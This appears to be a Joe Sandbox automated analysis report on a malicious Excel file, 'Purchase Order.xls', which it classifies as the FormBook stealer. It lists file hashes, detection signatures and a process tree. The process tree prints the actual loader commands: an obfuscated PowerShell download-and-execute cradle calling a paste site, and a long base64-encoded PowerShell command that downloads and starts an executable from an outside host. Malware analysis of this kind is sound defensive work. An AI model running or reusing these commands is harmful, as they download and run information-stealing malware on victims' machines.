Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order.xls

Overview

General Information

Sample Name:Purchase Order.xls
Analysis ID:372800
MD5:25d108bb3181b08a9fb2edc6713323b2
SHA1:e9983f38587f57213137c534be223a8931e33e2c
SHA256:744cfa43336e162820a03f1a6b2ff7fa9d2471f92f14691c5f59156c634d8015
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4228 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • powershell.exe (PID: 4544 cmdline: powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6204 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAZABSAGgAVQBYAG0AWQBIAFkAbgBPAEkAWgB3AHYAWgBHAEYAbQBGAFYAQwBqAGwARgBOAGQAcAB6AGgAYgBJAGQATABqAGoAewAgAHAAYQByAGEAbQAoACQAaABvAHIAcABBAFIAZwAgACwAIAAkAE4AWgBtAEwAYwBBAHEASQBTAFgAZwAgACwAIAAkAHQAcgBXAFIAdgBLAEsAbABHAHEASgBDAG8AawBJAHcAVQBSAFoAWABlAGcAZwBMAGcAQQBRAEUAUgBDAGcAdgBwACAALAAgACQATgBxAFIAWgB1AHEASAB1AEYAVwBQAGsAWAByAHMAdQBuAEIAeABKAEoATgBMAEwAbAB1AHQARgBVAEUASgBPAE4AQQAgACwAIAAkAFMAZQB2AFgAagBRAGoAYQBKAHYAdwBkAFoATQBXAE8AZgB4AGYAZgBBACAALAAgACQARgBvAHoAdwBCAGEAQgBOAEEAWABYAFQAYQBRAHMAZABPAHQAWgBtAEIAUQBvAFIAVQB0AHgAKQANAAoAJABDAHcAbgBzAGwARgBhAGYAUQBNAEUAVgBQAEwAUABIAHIAVQBiAGkAdwBQAEoASgBpAEgAcQBNAEcAZgBPAE4ATABqAEQAIAA9ACAAJwB5AE4AawB3AEkARwBwAEIAWgAnADsADQAKACQAagBXAE0AQQBsAHEASABCAHQAbQBtAGUASgBkAFAATwBZAGsAIAA9ACAAJwByAEoAZgBIAEYASQBkAGsAZgBaAHAAYQBJAGoATgBYAFQAegBGAHUAWABHAEsAcQBSAFgAVQBFAEcAZwB1AGgARQBEAGgATABFAE8ARwBzAEgARwAnADsADQAKACQAYgBEAE0AZAB1AHYARgB2AE8AVABxAGEAbAB5AG8AcQBpAG4AWgBkAHkAZgBJAFYAIAA9ACAAJwBDAEMAVABFAHQATgAnADsADQAKACQAUgBlAGkAbQBFAHQAYQBJAEEAbABmAE8ATgBkAHcATQBQAFkAWABFAGgAYwBkAHcAdgBxAFkAcgB0AG0AcQBVAEcAIAA9ACAAJwBJAEcAUABDAG0AJwA7AA0ACgAkAE4AUgBjAE4AegB1AEkAYwBHAHAARABnAFcASQBFAHAAQgBsAHIATgBWAGkAUABPAHUATABJAEoAVgBwAHcATgBtAGgAcgAgAD0AIAAnAHoAUAB4AEIAaQB3AGwARABpAEsAeQB4AHoAUwBGACcAOwANAAoAJABLAFkAVQBlAEMATwBTAG4AbQB5AEgAUQBzAHEAdQBvAFIAbgBxAGwAbwBwAGUAWgB3AEwAIAA9ACAAJwBrAE0ASwBLAEMAagBTAEMATgBOAE0ATwBrAHgASgBQAGsAbwBWAEwAcwBQAEoAZgBMAGIAVABxACcAOwANAAoAJAB1AHYAaABxAGgAaABiAGIAbwBFAGcAWgBuAGcAYgBGAFoARgAgAD0AIAAnAGUAYQB1AGsAYgBBAG8AVQBDAGYAeQBhAFEAYwBoAFMAUgBlAFgARABQAGkAbwB2AGsAbwBsAEYAagBpAGEAbABXAGYAJwA7AA0ACgAkAHUAQQBMAEcAcQB0AE0AWQB3AHEAZAAgAD0AIAAnAHgARgBPAEoAYQBCAEMAWgB2AG0AeQBBAG4AUABqACcAOwANAAoAJABVAEUATQBFAGsAUQBuAFMARwBZAGgASgBDAEsAcwBGAEcAWABvAHoAVgBaAEEAawBUAEcAUQBJAEIATABUAGIAIAA9ACAAJwBiAEQAcgBkAFoAZgBnAFMAdgBDACcAOwANAAoAJABVAHQAVwAgAD0AIAAnAHUAcwB0AFAAYQBqAFEAdQBFAGMAawBlAEEAZQBRAHYARgBHAHkAYgBHAEEAYwBnAHIASABoAFoAWAB5AFAAJwA7AA0ACgAkAGoAZgBPAEkAUgBEAEEAYgBLAEoAbgBCAHAAQgBnAG4AZgBHAHcATgB1AHYAZQAgAD0AIAAnAFEATQBYAFQAQwByAFgARgBNAEoAdgBVAFEASABlAEIARwBYAFEAeABOAGIAcgBxAGIAdAB1AFEAQwBDAGcAbgBCAFUAcwBFAGcAaAAnADsADQAKAH0ADQAKACQAVABsAGgAbwBmAEYATABYAFgAYwB1AEgAWABmAGcAZwBwAFYAZwByAEkAeAAgAD0AIAAnAEQASwBkAEkAUwB2AFAAJwA7AA0ACgBJAGYAIAAoACcAVgBaAHkAeABMAGcAbQBNAGsAUQBXAFcAbwBIAHUASQBIAFUAbwBDAGoAegAnACAALQBlAHEAIAAnAFEAVgBlAGQAZABCAHgAcwBiAEkAQwBaAGkAWgBoAFYAQQBEAEkAdgBiAGwAYQBUAHYAUQBVAEEAeQBIAE0AcQBWAGoAaAAnACkAIAB7AA0ACgAkAGgAQwBJAEsAbgBYAHYATwBsAGkATQBqAFoAegBvAHoAYQBEAE8AZgB2AEwAaABOACAAPQAgACcAdwB1AFQAdgBMAEQAeQByAEcAbwB4AHUAeQBJAEQAcABNAGgATgBEAGsAYQB5AFQATgBRAFIAVQBCACcAOwANAAoAJABWAFUAdQBjAHEAYwBiAFMAYQBlAE4AcwBUAEwAcQBGAGIAdgBMAHAAaQBkAFQASwB4AFcAdgAgAD0AIAAnAGkAdgAnADsADQAKACQAZQBwAGEAUwBkAHoAVgBSAGEATgB0AEgAagBxAHMASABuAGQASQBvAFcASgBNAHgAcwBBAGsAZgBVAGcAYgBrACAAPQAgACcAcwBqAEMAdAB0AE0ARgBHAGQAawBiAHAAVwBrAFUARQBQAEkAVwBhAEcAUABWAGQAZABaAGMAJwA7AA0ACgAkAHAAdwB0AG0ASgBjAHIARwBwAE4AdABRAEMAaQAgAD0AIAAnAFkAawBJAFYAUQBRAGIARgBZAEUASwBZAGMATwBZAFEAVABrAHEAUQBoAHEAcABmAHUAdABOAFAAQgBPAEcAWABZAFgAdwB0AFYAJwA7AA0ACgAkAE0AeQBPAHEAVgAgAD0AIAAnAHoARABPAHMAUQB4AGEAZwBMAFIATABpAHUAYwBiAFcARABMAEUASgB5AG0AQQBGAFIAZgB2AFAAWAAnADsADQAKACQAQwBxAFUASABnAHEAZQBVAHkARABvAFoATABHAEwATwB6AHMAYwBwAHUAQwBtAE0AagBNAEQASgBiAGwAQwBMAEkAVABQAFUATgAgAD0AIAAnAHYAawBzAGoATgBBAFYAWQBhAHQAdABEAGYAQwBtAGkAeAB6AEQASQBZAFUAbgBWAHQATQBCAGQAUQBzAHIAcQBCACcAOwANAAoAJAB4AHMAeABMAHAAbAByAEwAbQBLAFAAWAAgAD0AIAAnAEEAWgBhAFcAUABSACcAOwANAAoAJABPAGIAeABXAHEAIAA9ACAAJwB6AHIAJwA7AA0ACgAkAGkAQgBDAEMAVABFAHQAawAgAD0AIAAnAEsAUwBSAE4AaQBkAEYAVgBHAEIARABxAFYAYwBaAHcAeQBXAHUAYQBWAG8AbAB6AEQARABJAE4AVgBtAHYAZgAnADsADQAKACQAawBGAHkAbQBBAHQAVQBSAFUAdAB5AG4AUgBNAFoAYwBGAFUAaQB6AEoAUQBWAGcAUwBKAGUAVQBzAEEAVQBGAFkAegBsAFgAIAA9ACAAJwBKAHgAZABhAEoAQgB1AG4ATABtAHEAagBrAFAAUwBOAGcAZwBUAGoAUwBVAHIAJwA7AA0ACgAkAHoAWQBVAFoAdABQAFIAYgBDAEIAdwBXAEYAIAA9ACAAJwBBAFAAYgB0AEcAWABvAGwASABrAEMAcwBzAFQAUgBuAEkAbwBHAE8AYQAnADsADQAKACQAZwBWAHQAdwBVAFAAZwBqAFQAdgBJAEgAZwBFAEkAWQBOAFUAYQBPAFIAagBYAEEAVwB4AEoATwBzAEgAUQAgAD0AIAAnAHgAUABpAEYAegBLAEMAWQBFAFkAUgBHAGsAawBuAE4AZgBqAGEAbQBvAE0AVAB4AHkAcwBaAFcARwBTAHEATABmAFIASgBRACcAOwANAAoAJABDAFoARABSAEIASgBzAFIAUQBRAG0ASwB2AGkASQBnAGQAQwBsAHYAIAA9ACAAJwBIAEcAbABmAFMAbABpAEYAYgBTAGIAVwBxAGQASwBYAFUAbQBDAGIAZwBoAGIAbQBNAEsAawBoAGYAQgBPACcAOwANAAoAJABWAGwAdQBTAFIAbABqAFkASwBNAHAAeQBMAG4ARgBGAHkASQBKAFEAaQAgAD0AIAAnAEUAWgBlAHkAVABIAEIAQQBaAGEARABDAEIARgBpAHIARgBqACcAOwANAAoAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAcABBAGcAbwB2AHoAWgBXAFQATQB5AGcAWQBIAFIAYwBQAGsAZwBxAEcAeQBVAHsAIABwAGEAcgBhAG0AKAAkAGUAUQBVACAALAAgACQAZABiAFoARgBmAGoAWABzAHkAcABCAGgAVgBvAFMAUwBjAFcASgBtAE8AdQBJAG0AegBXAEcAQwBaAE8ARQBEAGsAaABCAFgAdABDACAALAAgACQAUgBDAGkARgBOAEEAWABOAEQAbQBRAFoASABIAGgAZABpAFQAbgAgACwAIAAkAEkAYwBVAFMAagBrACAALAAgACQAdwBuAG4AdgBZAGEAQQBzAGoAZwBwAHUAbABjAEoARABQAEoAbwB3AHcAQwBEAFMARQBHAHcATgBwAGkAUQBWAGQAQwBiAFoAUAByAHIAegBIAE8AIAAsACAAJAB4AHMAWQBCAGQAegBZAEUASQB2AG4AQgB1AGsAVQByAFMAZABuAEMAQQBRAFUAUgBqAEEAawBuAFkAUgBvAHAAaABEAEYAWgBmAEYAVABOAFIAZQBIACkADQAKACQAZQB1AE0ATQBLAFoAbABXAEoAdQBiAGkAVQB2AHMAWQBzAFMAVgBWAEYAWQBCAFgAbgBxAHkAZwB4AFEAVAByAGcAcABKAEEAIAA9ACAAJwBNAEwAdQBhAGIAWABlAGYAagBJAFQAcgBIAHkAbgBjAHkAbABGAHQAbwBaAFUAYQBFAFkAcwBhAGsAQgBlAGwAcwAnADsADQAKACQAZwBIAGIAdQBkAEEAWAByAEUAaQBlAG8AcQBTAGcATwBoAEUARABIAHkAbgByAFQAVgBEAGYARQB2AGgAZABpACAAPQAgACcAVgBSAGcAQgBFAEkARQBWAHcAVQBsAHcAUQBpAFoAdABXAFQAWgBoAGsAbgBzAFAASABaAFoAVgBUAHcAWABFAHcAcABVAEEAegBNAGQAdwB6AGwAQgAnADsADQAKACQARgBYAEYAVgBGAEsAWQBOAEUAQQBPAGkAWgBSAHQAZgBpACAAPQAgACcAQwBBAHgAaABBAGEATgBaAHUASgBxAGQAaQB6AGwAYQBKAGsAVABFAFAASQBYAEoAQQB2AGEAbQBiAGkAJwA7AA0ACgB9AA0ACgBGAHUAbgBjAHQAaQBvAG4AIABiAG4AZABpAHoAUgBpAHUAYgBTAHMAdAB3AHYAcwB2AEwARAB4AG0AaQBYAEUAQQBvAHIAaQBNAG4ASQBRAFAAewAgAHAAYQByAGEAbQAoACQAeQBOAFAAaQBCAFUAWQBXAGUASABnAFEAUABYAGEAUwBQACAALAAgACQAeQBIAEkATABkAFQAdABjAG8AaABGAHoAYQB4AEwAcABzAFEAUwBRAGsARgBsAE4AbwB3AGoAcwBJAG0AYQBjAEwAcABjAGEASwBtAGoAdgBvACAALAAgACQAZwByAFIAZQBnAGkARQBaAGUASgB6AHkATQB0AFcAdgBYAGcAawBCAFUAIAAsACAAJABIAGMAbwAgACwAIAAkAFYAawBmAEYAZwBYAGIATABZAHQAdgBKAFAAQQBvAGoASABRAGQATQBjAGoARQBQAFAAQwBMAG4ARQBmAGsAcAAgACwAIAAkAHYATgBUAHQAWgBkAGMAVwBCAFUAYwB6AE4AUgBqAE0AbAB0AHEAeQBiAEoAbABnAFEAcQBkAEwAbgBHAHQASgBHAFQAVQBuACAALAAgACQAcABpAG4AQgBwAGIATwBiAFEAQgBsAGMAYQBUAGwAdAByAE8AKQANAAoAJABqAEwAZwBMAHoAbgAgAD0AIAAnAEcAZwBuAEkAWABJAHAAZwBpAFgAWgBxAHQAYwBEAEUAaQBkAHUASQBpAFcARwBTAEMAZABvAE4AawBMAGsAJwA7AA0ACgAkAFAATQBmAEIAawB3AGMAZwBCAEIAZQAgAD0AIAAnAGkAYQBWAGQAZgBIAHkAaABGAGYAQgBrAGEAVQAnADsADQAKACQAdABUAGMAdwBXAG4AIAA9ACAAJwBhAGcAdwBCAFUAbQBBAE4ARwBnAHIAcgBrACcAOwANAAoAJABJAEwAaABjAE4AQwBGAGsASwB1AGIAUABxAGoATgBaAEYASABjAFQAQQBvAGcAZABuACAAPQAgACcAaABzAFoAVgB0AGoAagBkAGwASAB1ACcAOwANAAoAJABKAGsASQBwAFYAQgBhAEUAdgBSAEEAZwBiAGoATwBRAGMAVAAgAD0AIAAnAEQAcABCAFYATgBMAHAAQgBzAGcATgB4AEYAZgBrAHkAcgBMAEsAUwBlAEQAagBRAFAAcgBzACcAOwANAAoAJABKAFUAVABBAFIAYwBxAGUASQBQAHYAZABnAEEAaQBYAGkAVAB1AEIAcQBsAFcARgBSAEIAQQBBAEcAawBGAFYAVAB2AHMAWABOAE0AIAA9ACAAJwBkAG8ARgBwAGMAUQBnAG0AZQBVAEwAaQB3AHcAcQBEAFgAeABOAGoAUQBjAHAAWQBZAEsAWgAnADsADQAKACQAawBJAEsASwBWAG4AUgBOAGsAdgAgAD0AIAAnAHAAawBPAFcAZgB1AEIASQBaAGMAcwBVAFoAegBkAFAAQQB5AGgAUgBTAHIAVwBCAFcASwBBAE4ASgBmAGQAUwBjAEQAWQB5AEIARgBLACcAOwANAAoAJABXAEIAQQBoAHIAbgBrAEwAcwBYAFEATwBEAGQAYwB4AE8ATQB6AFYAdQBvAHoAdAB5AGEAIAA9ACAAJwBXAGEAZgBOAHUAbwBEAHYAUQByAG8ASwBpAGEAbwBVAGwATwBPAE8AeQBiAGEAagBwAEcAbwBqAGkAQgBHAGoAUQB3AE8AawBNACcAOwANAAoAJABWAGEAQQBpAEwARwBaAEMAUgB2ACAAPQAgACcAVABPAGYAagBNAHMAJwA7AA0ACgAkAHoAdgBZAG8AegBUAE0AUABrAEYAdABtAEwARQBIAGIAcwBvAE4AUQBRAFQASwBtAHAAdABkAE8AbgBhAHoARQBEAFQAawBSAG0AaABiAGgAIAA9ACAAJwB2AFYAVQBKAGUAagBCAEwAbgBuAHYAeQBjAGUAZwBsAGwAegBGACcAOwANAAoAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAZwBNAGMAUABDAHkAVwB5AEYAeABBAHgAcABKAHsAIABwAGEAcgBhAG0AKAAkAHkAYgBLAEcAbwBpAHMAVABxAHAATABOAGcAdQBVAHgAcABjAEsASwBjAEMAQQBuAEQARwBiAG8ARQBnAEEAaABWAHIAWAAgACwAIAAkAEwATgBVAHYAcQBpAFYAeQBjAGkAUwBoAEsAaQB2AEoAcAB2ACAALAAgACQAdgBiAFgAQwBpAEgARQBPAEsAcABkAHIAcAAgACwAIAAkAEEAbQBiAEkATwBUAHQAaABDAEwAVQBvAHQAZABXAGsAcQBzAFoAZAAgACwAIAAkAHMAbwBMAG0AbgBsAFUASwBJAHkAcQBkAEsASwB2AFQAQgBhAGIAVQBOAFoATABoACAALAAgACQATwBiAHIAWgB5AGwAUwBMAHYASQB4AFEAVgBhAGgAWgBXAHQATQBlAEwAagBUAGIAUgBwAFMAeABKAE4AVABjAGQAcwBaAEsAYwBrAEsAIAAsACAAJABZAFIATwBCAHgAQwBmAHoAdQB1AHIAZgAgACwAIAAkAEQAaQBlAEgAUQBJAEkAUwBVAEMAaABwAFYAbgBjAEIAWAB3AGwAaQB6AEYAdABWAFIAZABPAEsAUwBEAE8AVwBuAGQAWgBKAHUAQwBNAGMAQwB1AEUAKQANAAoAJABtAHUAeABBAFEAbgBLAEIAcgBOAFQARwBVAGsASgBmAEUAQgBlAG8ARQBCAHoASABVAGcAUQBSAHAAZABjAFUAbABNAFoAaQAgAD0AIAAnAHUAbgBiAFcASwAnADsADQAKACQAQgBqAHIAQwBOAHYAUgB2AHcATABWAGwAbAB1AHEAZwBqAFgAdABNAE8AbAB6AFYASABMAGIAYgBLAE4AQwAgAD0AIAAnAHQAUQB4AFkAYwBlAEMAVgBZAGgAZgBJAFEAYQBuAG4AJwA7AA0ACgAkAE4ARQBFAGQAeQBXAFEAawBXAHUAQwBVAHEAIAA9ACAAJwBpAEkARABzAFYAeABTAEUARQBWAFgAbgBnAEYAcQBFAGgAWQBvAE0AdwBJAHkAcAB1AHUAZwBuAEYAagBBACcAOwANAAoAJABpAHcAdwAgAD0AIAAnAE0AaQAnADsADQAKACQAcAB3AEoAegBpAEYATABwAEsAdQBSAE4AZABnAGQAbwAgAD0AIAAnAEsATwB4AGIAUQBlAHoAVgBVAFYARgBqAEkAcABzAHkARwB5AFEAbgBKAFAAagAnADsADQAKAH0ADQAKACQARQBXAHQAbgBXAFcAVgBFAEkAVwBwAHkAbABxAFkAUwBLAGUATwBrAEYARgBCAEUAWgBPAFgAaABOAEIAIAA9ACAAJwB1AGUATgBXAHUAawBMAHkAeAB6AEEAYgBtAHoAdAAnADsADQAKAEQATwB7AA0ACgAkAGQAegBqAE8AWQBVAEUAbABnAEgAcwBnAGIAaQAgAD0AIAAnAEIAbgBuAHcARABuAEEAbwBUAFkAdgBLAGoAegBHAEsATABNACcAOwANAAoAJAB2AG0ASwBTAEwAQwBWAEkAUgBqAEYAZgBoAGwATQBEAG0AQwB5AHIAYgBkAEwAUQBwAGMASwBWAG0AWgB3AGcAVQBiAG4AaAByAFYAYwB1AGgAZgBpACAAPQAgACcATgB0AE8AWQBXACcAOwANAAoAJABVAEgATQBVAFgAUgBiAHQAYwBpAHMAQQBXAHIAbQBZAEwARgB5AGUATQBRAGEARQBLAHcAdgBHAEMAdwBPAG0AeQBxAEYAcABUAHoARQBWACAAPQAgACcAeABzAHUAQgBoAEkAcQAnADsADQAKACQAcABoAEkAWgBzAGoARQBnAEkASwBhAFcAVQBxAGcAVAAgAD0AIAAnAEMAZwBtAHgARQBMAEIAJwA7AA0ACgAkAFgATwBYAGcAQwBjAG8ARQBwAE4ATwBHAE0ARwBHAEEASQBMAHAAZAB6AG0ASABNAGEAIAA9ACAAJwBmAGMARABVAGsAVgBHAHcAVQBWAGcAQQBHAGgAbQBTAGYAYwBSAE4AdAB2AFoAbABvAHQAVwBZAGQAbABHAEwARwBHAHgATABBAFUAYwBzACcAOwANAAoAJABRAGwAawBVAEkARgBIAHEAaABHAGUAdQBNAEIAagBEAFIAZgByAHkAaQBTAGkAUABVAHUAegBqAGIAUgBLAHoAWQBPAGQASgBvAFIAZwBvAFAAaQB3ACAAPQAgACcAYgBRAHQARgBPAEkAaQBwAGwAdABSAHgARABWAHoATgBGAFkAUABQAHcAZQBWAHkAWQBaAE8AJwA7AA0ACgAkAHkAQwAgAD0AIAAnAHoAVgBEAG4ARABBAHUAVQBTAGkAVQBPAGYAdwBnAEcAVABSAFMAaQByAFQAaABpAHgAdgB1AGcAcAB1ACcAOwANAAoAJABxAGoASwBSAGMAegBpAHcATQBMAEQAdwBnAGIAUQBxAEIAcwBTAHYAaQBnAFQAcwBnAG8AVQBwAEkAIAA9ACAAJwBOAGYAWQBBAGUAZQAnADsADQAKACQAZgBFAEgAawBWAEYAWABuAFcAQQBIAGcARQB0AG8AWAB5AHoAIAA9ACAAJwBQAFIAawBuAGUAcwBuAEgAeQBYACcAOwANAAoAJABmAHcAbABWAFcAbwBLAEsATgBhAHcARQBLAG4ATgBKAEQATQBZAEkAWgAgAD0AIAAnAFUAUABEACcAOwANAAoAJABRAGMAcwBoAHkAWgBRAHkAVgBLAHYAagBXAEEATQBvAGwAagBTAE0AYQBBAFIAagBqAHUAWgBQAHkAZABjAFYAUgBjAFgAaQBTAGYAYgAgAD0AIAAnAG8ATQBTAEMATgBVAHEAWAB3AGwAUQBrAHgAcQBVAFAASwBJAHkARQB6ACcAOwANAAoAJAB6AHIAaQAgAD0AIAAnAFIAdQBkAGQAVgBHAEgAdgBZAE4AaQBQAFYAUABFAEMAUwBOAE4AcgBZAGIAJwA7AA0ACgAkAFAAWgB4AGMAZQBBAHkAZAB6AFUAcABOAEgAPQAgACQAUABaAHgAYwBlAEEAeQBkAHoAVQBwAE4ASAAgACsAIAAxADsAfQAgAFcAaABpAGwAZQAgACgAJABQAFoAeABjAGUAQQB5AGQAegBVAHAATgBIACAALQBuAGUAIAAxADIAKQANAAoARgB1AG4AYwB0AGkAbwBuACAARABsAHMAZgBnAEYAYQB6AEcAVwBzAHAAewAgAHAAYQByAGEAbQAoACQASABYAEoAaABYAFkAbQBNACAALAAgACQAVABvAEQAdgB1AFMAUABKAGMAQwBTAEcAaAB2AG4AaQBBAHgAaQBsAGQAcQBBACAALAAgACQAbQBWAEcATQBZAGsAVwBsAEIASAB2AGcATQBJAEgAegB5AEQAUABXAEkAQgBaAGMAVwB5AFgAYQBFAGEAdwBkAG8ATQBKAFoAKQANAAoAJABuAGEAYgBkAGgAbAB2AGQAcABaAE4AdwBoAGEASwBTAHMAegB6AGkAbQB2AFMAVwByAGIAdgB6AGMAUQAgAD0AIAAnAGUAawBWAG4AVwBDAEsAZgBYAGQAaQBOAEwAZgBpAHoAZgBRAGgATwBXAHQASAB3AHMAJwA7AA0ACgAkAEUAbQBGAHAAdwBCAFoAeAAgAD0AIAAnAEwATQBtAG8AUQBpAFQAYgBFAEQAaABIAHEASQBjAFEAagB2AEMARgBsAGQAWQB2AE8AeABYAFoAaAAnADsADQAKACQAaABvAE8AeABYAG0AcwBjAFEAZgBDAFIARABzAEsAQQBPAGQAYwBZAE4ARgBXAHIAdwBpAG4AcgBaACAAPQAgACcASwB0AHQAVwBXAHMAdAB0AGwAcABZAEgAZQBXAEQAVQBaACcAOwANAAoAJABrAE4AagB0AHgASQBVAGMAUgBXAEEAbwB6AEEAQwB4AFYASQBZAGcAVgBTAEgAVQBzAG4AQQBGACAAPQAgACcAQQBvAGMASQBHAEgATABqAFEAdwBrAEMAdABhAFcAcwB3AHEAWQBFAGcAQQB1ACcAOwANAAoAJAB0AEsAUwBGAE8AQgBLAEkATwBCAFIAaQBZAGcAcwBzAHEATgBGAE0AbgBkAGMAcgBsAGMAdwB3AGIAQgB0AHoAdABnAE8AdwBwAEcAVgBQACAAPQAgACcAYgBuAHMASgBuAFQAUAB4AGYATgBTAHYAaQBJAFAAaQBhAFQAbQBFAE4AaABOAEgAUgBvAHIAUgB3AEQAawBzAHEAJwA7AA0ACgB9AA0ACgAgACgATgBFAHcALQBvAGIAagBFAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAuAEQAbwB3AG4ATABvAEEAZABmAEkAbABFACgAIAAdIGgAdAB0AHAAOgAvAC8AcwBpAG0AcABzAG8AbgBnAHIAbwB1AHAALgByAHUALwB3AHAALQBhAGQAbQBpAG4ALwBiAGkAbgAuAGUAeABlAB0gIAAsACAAHSAkAEUATgB2ADoAdABlAG0AcABcAHEATQBCAFIAawBJAC4AZQB4AGUAHSAgACkAIAA7ACAAcwB0AEEAUgB0ACAAHSAkAEUATgB2ADoAdABlAG0AcABcAHEATQBCAFIAawBJAC4AZQB4AGUAHSANAAoAVwBoAGkAbABlACAAKAAkAFAAVQB1AGoAcAAgAC0AbgBlACAANgApACAAewANAAoAJABiAGsAaABTAEoAVABRAGMAUgBDAFUATwBSAHYAbgBOAFYAdQBIAHIAdwBLAFcAegB1AFQAIAA9ACAAJwBGAG8AbgBKAG4ASQB6AHAAdABnAGkAcgB0AFUARABMAEkAYgB5AE8AVABRAEMAeQBBAGIAJwA7AA0ACgAkAFAAVQB1AGoAcAA9ACAAJABQAFUAdQBqAHAAIAArACAAMQA7ACQAaABRAE8AaQBYAHAAcQBLAG4AZAB0AGcARgBTAEcAdABoAG4AQwBOAFgAcwB5AE4AWAB3AEYASwBvAG0AcABKAE0ATABTAFkAZgB4AEsAQwBEAEoAIAA9ACAAJwBpAFAAdQB0AHcATgBYAFYASwB4AE4AYQBvAFIAQQAnADsADQAKACQAUABVAHUAagBwAD0AIAAkAFAAVQB1AGoAcAAgACsAIAAxADsAJABiAGsAZgBXAEIAbwBrAFUAdQB6ACAAPQAgACcATwBqAGMAQQBKAE4AYwBRAHkAZABDAEoAdwBRAFIAZQBMAHkAawBkAEgAZQBtAGkAUwBYAG0AUAAnADsADQAKACQAUABVAHUAagBwAD0AIAAkAFAAVQB1AGoAcAAgACsAIAAxADsAJABlAFoAegB3AGcASQBsAGgAeABEAE0ATQBBAEIAaABaAGEAagBGAGsASwBaAFcASgBWAGEAagB3AHUAaABtAGIATQBYAFUARABEAE0AIAA9ACAAJwBIAGYAdwBPAHUAWQBRAEcAZABGAEoAcgBvAGgAZgAnADsADQAKACQAUABVAHUAagBwAD0AIAAkAFAAVQB1AGoAcAAgACsAIAAxADsAJABGAEQAcQBhAEcAWgBwAG4AUABSAGwAQQBkAGgAZQBXAE8AVAB4AEUATgBMAGMAawBGAFQARwByAGsAcQAgAD0AIAAnAHQAaABvAFAAQQBNAGwASwBpAHEASQB5AGMAbgBRAGQAdgBiAG4AZABWAGoAYQBWAHQAYgBGAFYAbQBTAHgARABaAFQAcgBTAG8AUgBlAEoAYwBJACcAOwANAAoAJABQAFUAdQBqAHAAPQAgACQAUABVAHUAagBwACAAKwAgADEAOwAkAE8ARQBNAHoAeABvAHEASwBQAHcATQBjAEsASAAgAD0AIAAnAFYAWQBHAFEAWABQAHMARgBaAEkAdgB5AG8AZQB4AGUAQQAnADsADQAKACQAUABVAHUAagBwAD0AIAAkAFAAVQB1AGoAcAAgACsAIAAxADsAfQANAAoARABPAHsADQAKACQAbgBxAEIAcABCAGcAUwBTAE0AUQBxAHYAQwBuAHgAeQBpAGIASABLAHkATgBSAFAAbgBTAGkAcgBiAG8AYgBVAHAAUgB1AGsARwByAHUAYgBPAG8AQQAgAD0AIAAnAHEAUABUAEkASABFAGQASgByAEwAQQBaAFoAbQBDAGkAeQBiAHEAWABwAFYARwAnADsADQAKACQAdABNAHIAcgBnAGYAdgBKAE4AcQBaAFgAegBaAGsAWABMAFIAZABkAFEAVQBMAFUAbwBNAGQAbgB5AGMAbAAgAD0AIAAnAEoAaQBPAHUATgBtAGQATABRAHIATQBpAE4AZgBqAFkAcgBTACcAOwANAAoAJABYAHMAYwBUAFkAQgBXAEMAVQBDAEgATAAgAD0AIAAnAEUARQBPAFEATABwAEsAWQBuAFIATgBaAEgAYwBHAEoAZABGAHcAZgBRAE4AYgBnAE8AcABzAHEAawBKAEoAJwA7AA0ACgAkAGYAYwBlAEkAUgBTAE4AQgAgAD0AIAAnAG4AagBiAFAAdABSAFoAUAAnADsADQAKACQAcgB4AEsAZgBVAHIAZABoAEIAVgB3AFUAbwBlAEgARQB0AGYAeAB5